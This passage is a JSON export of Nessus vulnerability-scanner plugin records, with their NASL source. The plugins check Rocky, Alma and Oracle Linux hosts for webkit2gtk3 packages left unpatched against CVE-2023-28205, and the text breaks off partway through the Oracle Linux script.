"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel-debuginfo", "cpe:/o:rocky:linux:9"], "id": "ROCKY_LINUX_RLSA-2023-1918.NASL", "href": "https://www.tenable.com/plugins/nessus/174798", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# Rocky Linux Security Advisory RLSA-2023:1918.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174798);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/06\");\n\n script_cve_id(\"CVE-2023-28205\");\n script_xref(name:\"RLSA\", value:\"2023:1918\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n\n script_name(english:\"Rocky Linux 9 : webkit2gtk3 (RLSA-2023:1918)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Rocky Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Rocky Linux 9 host has packages installed that are affected by a vulnerability as referenced in the\nRLSA-2023:1918 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5\n and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing\n maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this\n issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.rockylinux.org/RLSA-2023:1918\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=2185724\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28205\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:rocky:linux:9\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Rocky Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RockyLinux/release\", \"Host/RockyLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RockyLinux/release');\nif (isnull(os_release) || 'Rocky Linux' >!< os_release) audit(AUDIT_OS_NOT, 'Rocky Linux');\nvar os_ver = pregmatch(pattern: \"Rocky(?: Linux)? release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Rocky Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Rocky Linux 9.x', 'Rocky Linux ' + os_ver);\n\nif (!get_kb_item('Host/RockyLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Rocky Linux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debuginfo-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debuginfo-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debuginfo-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debugsource-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debugsource-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debugsource-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'Rocky-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-debuginfo / webkit2gtk3-debugsource / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-20T13:41:57", "description": "The remote AlmaLinux 8 host has packages installed that are affected by a vulnerability as referenced in the ALSA-2023:1919 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-21T00:00:00", "type": "nessus", "title": "AlmaLinux 8 : webkit2gtk3 (ALSA-2023:1919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-21T00:00:00", "cpe": ["p-cpe:/a:alma:linux:webkit2gtk3", "p-cpe:/a:alma:linux:webkit2gtk3-devel", "p-cpe:/a:alma:linux:webkit2gtk3-jsc", "p-cpe:/a:alma:linux:webkit2gtk3-jsc-devel", "cpe:/o:alma:linux:8", "cpe:/o:alma:linux:8::appstream", "cpe:/o:alma:linux:8::baseos", "cpe:/o:alma:linux:8::highavailability", "cpe:/o:alma:linux:8::nfv", "cpe:/o:alma:linux:8::powertools", "cpe:/o:alma:linux:8::realtime", "cpe:/o:alma:linux:8::resilientstorage", "cpe:/o:alma:linux:8::sap", "cpe:/o:alma:linux:8::sap_hana", "cpe:/o:alma:linux:8::supplementary"], "id": "ALMA_LINUX_ALSA-2023-1919.NASL", "href": "https://www.tenable.com/plugins/nessus/174606", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# AlmaLinux Security Advisory ALSA-2023:1919.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174606);\n script_version(\"1.0\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/21\");\n\n script_cve_id(\"CVE-2023-28205\");\n script_xref(name:\"ALSA\", value:\"2023:1919\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n\n script_name(english:\"AlmaLinux 8 : webkit2gtk3 (ALSA-2023:1919)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote AlmaLinux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote AlmaLinux 8 host has packages installed that are affected by a vulnerability as referenced in the\nALSA-2023:1919 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5\n and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing\n maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this\n issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.almalinux.org/8/ALSA-2023-1919.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28205\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(416);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::highavailability\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::nfv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::powertools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::realtime\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::resilientstorage\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::sap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::sap_hana\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::supplementary\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Alma Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AlmaLinux/release\", \"Host/AlmaLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/AlmaLinux/release');\nif (isnull(os_release) || 'AlmaLinux' >!< os_release) audit(AUDIT_OS_NOT, 'AlmaLinux');\nvar os_ver = pregmatch(pattern: \"AlmaLinux release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'AlmaLinux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'AlmaLinux 8.x', 'AlmaLinux ' + os_ver);\n\nif (!get_kb_item('Host/AlmaLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'AlmaLinux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.36.7-1.el8_7.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el8_7.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el8_7.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'Alma-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-20T13:39:15", "description": "The remote Oracle Linux 9 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2023-1918 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-20T00:00:00", "type": "nessus", "title": "Oracle Linux 9 : webkit2gtk3 (ELSA-2023-1918)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28205"], "modified": "2023-09-18T00:00:00", "cpe": ["cpe:/o:oracle:linux:9", "p-cpe:/a:oracle:linux:webkit2gtk3", "p-cpe:/a:oracle:linux:webkit2gtk3-devel", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel"], "id": "ORACLELINUX_ELSA-2023-1918.NASL", "href": "https://www.tenable.com/plugins/nessus/174583", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2023-1918.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174583);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/18\");\n\n script_cve_id(\"CVE-2023-28205\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n\n script_name(english:\"Oracle Linux 9 : webkit2gtk3 (ELSA-2023-1918)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 9 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2023-1918 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5\n and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing\n maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this\n issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2023-1918.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28205\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(os_release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:os_release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 9', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = 